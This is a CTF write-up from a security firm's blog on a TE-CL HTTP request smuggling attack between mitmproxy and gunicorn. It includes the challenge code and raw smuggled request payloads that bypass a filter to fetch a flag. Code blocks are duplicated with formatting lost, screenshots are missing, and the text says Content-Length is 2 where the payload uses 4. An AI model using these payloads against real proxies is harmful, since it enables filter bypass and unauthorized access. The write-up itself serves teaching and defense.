HTTP Request Smuggling - Deteact - continuous information security services

There’re many different attacks under the name HTTP Request Smuggling. Let’s look at a simple example from the past SpamAndFlags CTF competition (I participated with More Smoked Leet Chicken team and we sadly finished 2^nd).

The vulnerable application (challenge) was deployed using gunicorn as an application server and mitmproxy as a WAF and consisted of 2 files: run.sh and filter.py. The flag for this task was located in the same directory in the file named “flag”.

The code for run.sh:

#!/bin/bash
mitmdump --mode reverse:http://127.0.0.1:8000 -p 8080 -s filter.py --set block_global=false --no-http2 &amp;
gunicorn --threads 8 --bind 127.0.0.1:8000 flask_autoindex.run:app

#!/bin/bash

mitmdump --mode reverse:http://127.0.0.1:8000 -p 8080 -s filter.py --set block_global=false --no-http2 &

gunicorn --threads 8 --bind 127.0.0.1:8000 flask_autoindex.run:app

The code for filter.py:

from mitmproxy import http
import re

def request(flow):
    if 'flag' in flow.request.url or re.match(r'^http://127.0.0.1:8000/[a-z._/]*$', flow.request.url) is None:
        flow.response = http.HTTPResponse.make(418, b"I'm a teapot!")

from mitmproxy import http

import re

def request(flow):

if 'flag' in flow.request.url or re.match(r'^http://127.0.0.1:8000/[a-z._/]*$', flow.request.url) is None:

flow.response = http.HTTPResponse.make(418, b"I'm a teapot!")

So basically, what we need to do is somehow request http://target:8080/flag, but we cannot pass substring “flag” in the request URI, neither can we encode the path because of regex matching:

Such setup with a reverse-proxy is a typical target for the HTTP request smuggling attacks. The intended solution (and a well-known technique) for this challenge was to upgrade the connection to websocket using differences in the Sec-WebSocket-Key1 header handling in gunicorn and mitmproxy. But I found probably more obvious exploit.

How do you approach such a task? Obviously you need to read source code of both mitmproxy and gunicorn to figure out how do they parse HTTP messages.

The clue can be seen in the mitmproxy/net/http/http1/read.py and gunicorn/http/message.py files in mitmproxy and gunicorn source code respectfully.

Chunked encoding detection in mitmproxy:

Chunked encoding detection in gunicorn:

Clearly the two web servers treat Transfer-Encoding header value differently (whole string match vs substring match) which creates a possibility for a “TE-CL” HTTP Request Smuggling attack.

Let’s deploy the application locally and test it with the Wireshark listening. Try the following payload:

GET /z HTTP/1.1
Host: 127.0.0.1:8080
Transfer-Encoding: chunkedasd
Content-Length: 4

2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8080


0

GET /z HTTP/1.1

Host: 127.0.0.1:8080

Transfer-Encoding: chunkedasd

Content-Length: 4

GET /flag HTTP/1.1

Host: 127.0.0.1:8080

Here we made mitmproxy believe that this is a chunked request (since the “chunked” substring is present in the header value). The chunked request body contains a chunk of length 44 (0x2c) which contains another HTTP message.

Now, gunicorn doesn’t handle this as a chunked request because the Transfer-Encoding header is not equal to “chunked”. Furthermore, the Content-Length value is 2 (this is required to get rid of “2c” string), so gunicorn treats the rest of the message as another HTTP request. But the response doesn’t have anything interesting in it:

Why is that? Here’s what we have in Wireshark when tested locally:

That’s nice, gunicorn actually returns responses for both requests, but we (as an external attacker) can see only the first one because mitmproxy only expects a single HTTP response and reads it accordingly (up to the length specified in the Content-Length header).

In order to get the second response we need to send another HTTP request to mitmproxy in the same connection so that it will expect one more response:

GET /z HTTP/1.1
Host: 127.0.0.1:8080
Transfer-Encoding: chunkedasd
Content-Length: 4

2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8000


0

GET / HTTP/1.1
Host: 127.0.0.1:8080

GET /z HTTP/1.1

Host: 127.0.0.1:8080

Transfer-Encoding: chunkedasd

Content-Length: 4

GET /flag HTTP/1.1

Host: 127.0.0.1:8000

GET / HTTP/1.1

Host: 127.0.0.1:8080

As a result, our request successfully reaches the “secret backend endpoint” and we get the flag in the second response:

Whose fault is this bug? Well, that’s a tricky question. Both implementations don’t properly parse HTTP headers and their values, so there’s no single bug here. Probably gunicorn’s exact string matching is too strict, and it’s clearly not RFC compliant, because Transfer-Encoding header can contain a list of values (e.g. “chunked, deflate”), thus many other setups may be vulnerable.

As you can see, securing web applications and multi-layered infrastructures can be tricky. If you’re not sure about the security of your product, contact us for penetration testing or consulting.

Leave a Reply Cancel reply